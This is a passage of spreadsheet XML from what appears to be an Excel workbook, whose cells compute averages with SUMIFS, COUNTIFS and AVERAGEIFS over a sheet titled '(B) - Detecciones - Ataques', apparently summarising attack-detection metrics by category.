    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>7.4</v>
      </c>
      <c r="AF152" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$BP$3:$BP$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>0.03272727273</v>
      </c>
      <c r="AG152" s="271"/>
      <c r="AH152" s="352" t="s">
        <v>2574</v>
      </c>
      <c r="AI152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.0006952108216</v>
      </c>
      <c r="AJ152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AK$131)
</f>
        <v>0.25</v>
      </c>
      <c r="AL152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AL$131)
</f>
        <v>0</v>
      </c>
      <c r="AM152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AM$131)
</f>
        <v>0.000001424625217</v>
      </c>
      <c r="AN152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AO152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AP152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AQ152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AQ$131)
</f>
        <v>0.005263157895</v>
      </c>
      <c r="AR152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AR$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="AS152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AT152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AT$131)
</f>
        <v>3</v>
      </c>
      <c r="AU152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AU$131)
</f>
        <v>2</v>
      </c>
      <c r="AV152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AV$131)
</f>
        <v>1</v>
      </c>
      <c r="AW152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="AX152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AX$131)
</f>
        <v>0.5</v>
      </c>
      <c r="AY152" s="534" t="s">
        <v>12</v>
      </c>
      <c r="AZ152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AZ$131)
</f>
        <v>0</v>
      </c>
      <c r="BA152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BA$131)
</f>
        <v>0</v>
      </c>
      <c r="BB152" s="534" t="s">
        <v>12</v>
      </c>
      <c r="BC152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BC$131)
</f>
        <v>0.3333333333</v>
      </c>
      <c r="BD152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BE152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BE$131)
</f>
        <v>0</v>
      </c>
      <c r="BF152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BF$131)
</f>
        <v>0</v>
      </c>
      <c r="BG152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BG$131)
</f>
        <v>0</v>
      </c>
      <c r="BH152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BH$131)
</f>
        <v>396</v>
      </c>
      <c r="BI152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BJ152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BK152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BL152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BL$131)
</f>
        <v>0</v>
      </c>
      <c r="BM152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BM$131)
</f>
        <v>4.759348739</v>
      </c>
      <c r="BN152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BN$131)
</f>
        <v>764.0161657</v>
      </c>
      <c r="BO152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BP152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BQ152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BQ$131)
</f>
        <v>0</v>
      </c>
      <c r="BR152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BS152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BS$131)
</f>
        <v>0</v>
      </c>
      <c r="BT152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BU152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BV152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BV$131)
</f>
        <v>0</v>
      </c>
      <c r="BW152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BW$131)
</f>
        <v>0</v>
      </c>
      <c r="BX152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="BY152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BY$131)
</f>
        <v>0.0625</v>
      </c>
      <c r="BZ152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, BZ$131)
</f>
        <v>0.08130081301</v>
      </c>
      <c r="CA152" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CB152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CC152" s="534" t="s">
        <v>12</v>
      </c>
      <c r="CD152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CE152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CF152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CF$131)
</f>
        <v>0</v>
      </c>
      <c r="CG152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CH152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CH$131)
</f>
        <v>1</v>
      </c>
      <c r="CI152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CI$131)
</f>
        <v>0</v>
      </c>
      <c r="CJ152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CK152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CK$131)
</f>
        <v>8</v>
      </c>
      <c r="CL152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CM152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CM$131)
</f>
        <v>1.5</v>
      </c>
      <c r="CN152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CN$131)
</f>
        <v>0</v>
      </c>
      <c r="CO152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CO$131)
</f>
        <v>0.25</v>
      </c>
      <c r="CP152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CP$131)
</f>
        <v>11.5</v>
      </c>
      <c r="CQ152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CQ$131)
</f>
        <v>0</v>
      </c>
      <c r="CR152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CS152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CS$131)
</f>
        <v>0.001093742224</v>
      </c>
      <c r="CT152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CT$131)
</f>
        <v>0.001996007984</v>
      </c>
      <c r="CU152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CV152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CV$131)
</f>
        <v>0</v>
      </c>
      <c r="CW152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="CX152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CX$131)
</f>
        <v>0</v>
      </c>
      <c r="CY152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, CY$131)
</f>
        <v>16</v>
      </c>
      <c r="CZ152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DA152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DB152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DC152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DD152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DE152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DF152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DG152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DH152" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DH$131)
</f>
        <v>0.04</v>
      </c>
      <c r="DI152" s="533" t="s">
        <v>12</v>
      </c>
      <c r="DJ152" s="519">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$BP$3:$BP$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, DJ$131)
</f>
        <v>0.09090909091</v>
      </c>
      <c r="DK152" s="271"/>
    </row>
    <row r="153">
      <c r="J153" s="277"/>
      <c r="K153" s="512"/>
      <c r="L153" s="512"/>
      <c r="M153" s="512"/>
      <c r="N153" s="512"/>
      <c r="O153" s="278"/>
      <c r="Q153" s="271"/>
      <c r="R153" s="352" t="s">
        <v>2575</v>
      </c>
      <c r="S153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, S$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; S$131 &amp; "*"
    )
)
</f>
        <v>0.3401610615</v>
      </c>
      <c r="T153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, T$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; T$131 &amp; "*"
    )
)
</f>
        <v>0.004526034314</v>
      </c>
      <c r="U153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, U$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; U$131 &amp; "*"
    )
)
</f>
        <v>1.268859649</v>
      </c>
      <c r="V153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, V$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; V$131 &amp; "*"
    )
)
</f>
        <v>3.90625</v>
      </c>
      <c r="W153" s="532">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, W$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; W$131 &amp; "*"
    )
)
</f>
        <v>13</v>
      </c>
      <c r="X153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, X$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; X$131 &amp; "*"
    )
)
</f>
        <v>0.1428571429</v>
      </c>
      <c r="Y153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Y$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Y$131 &amp; "*"
    )
)
</f>
        <v>80.46666667</v>
      </c>
      <c r="Z153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, Z$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; Z$131 &amp; "*"
    )
)
</f>
        <v>8329.195938</v>
      </c>
      <c r="AA153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AA$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AA$131 &amp; "*"
    )
)
</f>
        <v>1.400484678</v>
      </c>
      <c r="AB153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AB$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AB$131 &amp; "*"
    )
)
</f>
        <v>22.203125</v>
      </c>
      <c r="AC153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AC$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AC$131 &amp; "*"
    )
)
</f>
        <v>5.4</v>
      </c>
      <c r="AD153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AD$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AD$131 &amp; "*"
    )
)
</f>
        <v>0.9257031357</v>
      </c>
      <c r="AE153" s="501">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AE$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AE$131 &amp; "*"
    )
)
</f>
        <v>7.64</v>
      </c>
      <c r="AF153" s="502">
        <f>(
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    SUMIFS(
        '(B) - Detecciones - Ataques'!$DF$3:$DF$139,
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
) / (
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$B$3:$B$139, AF$131
    ) +
    COUNTIFS(
        '(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",
        '(B) - Detecciones - Ataques'!$C$3:$C$139, "*" &amp; AF$131 &amp; "*"
    )
)
</f>
        <v>3.933301585</v>
      </c>
      <c r="AG153" s="271"/>
      <c r="AH153" s="352" t="s">
        <v>2575</v>
      </c>
      <c r="AI153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AI$131)
</f>
        <v>0.180322123</v>
      </c>
      <c r="AJ153" s="518">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$DF$3:$DF$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, AJ$131)
</f>
        <v>0</v>
      </c>
      <c r="AK153" s="518">
